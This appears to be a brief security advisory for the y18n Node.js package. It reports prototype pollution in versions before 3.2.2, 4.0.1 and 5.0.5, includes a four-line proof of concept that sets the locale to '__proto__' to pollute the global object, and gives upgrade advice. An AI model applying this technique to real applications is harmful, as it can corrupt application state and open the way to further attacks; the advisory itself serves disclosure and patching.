y18n
before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to prototype pollution.
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later
CPE | Name | Operator | Version |
---|---|---|---|
y18n | lt | 3.2.2||=4.0.0||>=5.0.0 <5.0.5 |